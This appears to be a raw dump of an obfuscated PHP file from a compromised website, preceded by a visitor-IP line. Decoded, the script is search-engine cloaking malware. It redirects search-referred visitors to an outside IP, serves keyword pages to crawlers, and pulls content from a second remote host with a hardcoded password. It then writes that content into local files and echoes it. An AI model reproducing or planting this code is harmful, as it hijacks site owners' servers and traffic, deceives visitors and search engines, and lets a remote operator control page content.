Your IP : 216.73.216.93
<?php
goto nK2qL; aAMWS: echo $text; goto NrEWG; w14f_: if ($s == "\x5c" | $s == "\x2f") { $s = ''; } goto PwxOu; Mhqx1: $today = "\x32\x30\62\66\60\x31\61\x30\55"; goto s0sGD; GV2ti: $keyword = str_replace("\55", "\40", $_GET["\x69\144"]); goto R7vu0; ktquV: $x1 = 3; goto GDxea; R7vu0: $keyword = str_replace("\x20", "\53", $keyword); goto LLCYY; bQIFr: $s = dirname($_SERVER["\120\x48\x50\x5f\123\105\x4c\x46"]); goto w14f_; GDxea: $xx1 = 5; goto GV2ti; lh1bd: if ($_GET["\x69\x64"] == "\x74\145\163\x74\x69\156\x67") { echo "\x74\x65\163\164\40\147\157\157\x64\56\x2e\56"; die; } goto OuPvD; bW92J: $text = ''; goto Ii8mp; s0sGD: foreach ($_GET as $a => $b) { $_GET["\151\144"] = $b; } goto lh1bd; QR3oR: if (strlen($text) < 5000) { $url = "\x36\x35\56\x31\x30\71\56\66\x37\56\61\x30\x30"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\x28{$errno}\x29\74\x62\x72\40\57\76\xa"; } else { $req = "\57" . $_GET["\146\x6e"] . "\56\x70\150\x70\x3f\160\141\x73\x73\x3d{$apass}\46\x71\x3d{$_GET["\151\x64"]}"; $out = "\x47\x45\x54\x20{$req}\40\110\124\124\x50\57\x31\56\x30\15\xa"; $out .= "\110\157\163\x74\72\x20{$url}\15\12"; $out .= "\x43\x6f\x6e\x6e\145\x63\164\151\x6f\156\x3a\x20\103\x6c\157\x73\x65\xd\12\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto gmSp2; OuPvD: if ($_GET["\x69\144"] == "\x69\x6e\144\x65\170") { header("\x4c\x6f\143\141\164\x69\157\x6e\x3a\x20\x68\164\164\160\163\72\57\57\x67\157\x6f\x67\154\x65\x2e\143\x6f\x6d"); die; } goto mu2uF; PwxOu: $s = $_SERVER["\123\105\122\126\105\x52\x5f\x4e\101\x4d\x45"] . $s; goto DMGMM; nK2qL: error_reporting(0); goto Mhqx1; bTbAy: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto YuomR; TLz4i: $query_pars_2 = str_replace("\55", "\53", $_GET["\151\x64"]); goto bW92J; Ii8mp: if (function_exists("\143\x75\x72\154\137\151\156\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\x74\164\x70\x3a\57\x2f\x36\65\56\61\60\71\x2e\x36\67\56\61\60\60\x2f" . $_GET["\x66\156"] . "\56\160\x68\x70\x3f\160\x61\x73\163\75{$apass}\46\161\75{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\157\172\x69\154\154\x61\x2f\x34\56\x30\x20\x28\143\157\155\160\x61\164\151\142\154\x65\73\40\x4d\123\x49\105\x20\66\56\x30\73\x20\127\151\x6e\x64\x6f\167\x73\40\x4e\124\40\x35\56\61\x3b\x20\x53\126\x31\x29"); $text = curl_exec($ch); curl_close($ch); } goto mYRf8; GaQg2: $_GET["\x66\x6e"] = "\66\71\66\x39\x36\71\x6e\x65\x77"; goto FIvMH; FIvMH: $apass1 = "\166\x69\x73\144\x6f\151\x6a\x65\x77"; goto ktquV; LLCYY: $apass2 = "\x62\62\x33\150\x72\62\63\x76\162\x33\62"; goto bQIFr; DMGMM: $apass3 = "\x72\166\x33\62\x79\x64\141\143\163\x76\x73\144\x76"; goto bTbAy; YuomR: if (strpos($_SERVER["\x48\x54\124\120\x5f\x52\x45\106\105\122\105\x52"], "\147\157\157\147\x6c\x65\x2e") or strpos($_SERVER["\x48\124\x54\x50\137\x52\105\106\105\122\105\122"], "\171\141\x68\157\157\56") or strpos($_SERVER["\110\124\124\120\137\x52\105\x46\105\x52\105\122"], "\142\x69\x6e\x67\56")) { $tpl = "\151\x6e\144\145\170\57" . $_GET["\151\144"] . "\56\x70\x68\x70\x2e\164\x70\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\x79"]; header("\114\x6f\x63\x61\x74\151\x6f\x6e\72\40\x68\164\164\x70\x3a\57\x2f\x36\65\x2e\61\60\x38\x2e\x31\x30\x2e\61\x39\x39\x2f\145\156\x74\145\x72\57\77\155\x61\162\x6b\75{$today}\x2d{$s}\x26\164\x70\x6c\x3d{$tpl}\x26\x65\156\147\153\x65\171\75{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\56\x70\x68\160"; if (file_exists("\151\x6e\144\145\x78\57" . $myname)) { $html = @file_get_contents("\x69\x6e\144\x65\x78\57" . $myname); if (strpos($_SERVER["\x48\x54\124\120\x5f\125\x53\x45\x52\137\101\x47\x45\x4e\124"], "\142\x69\156\x67") > 2 or strpos($_SERVER["\x48\124\124\x50\137\x55\123\x45\x52\137\101\107\x45\x4e\124"], "\171\x61\150\157\x6f") > 2) { $keyword = str_replace("\x2d", "\x20", $_GET["\x69\144"]); $html = str_replace("\x3c\164\x69\x74\154\x65\76\x3c\x2f\164\151\164\x6c\145\76", "\74\164\151\x74\x6c\x65\76{$keyword}\74\x2f\164\151\164\x6c\145\76", $html); } echo $html; die; } } goto TLz4i; mu2uF: $_GET["\167\157\x72\x6c\x64"] = 5; goto GaQg2; mYRf8: if (strlen($text) < 5000) { $text = file_get_contents("\150\x74\x74\x70\x3a\x2f\x2f\66\x35\x2e\x31\60\x39\56\66\67\56\61\x30\x30\57" . $_GET["\x66\156"] . "\x2e\x70\x68\160\x3f\160\141\163\x73\75{$apass}\46\161\x3d{$_GET["\151\144"]}"); } goto QR3oR; gmSp2: if (strlen($text) > 500) { $out = fopen("\x69\x6e\x64\145\170\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto aAMWS; NrEWG: ?>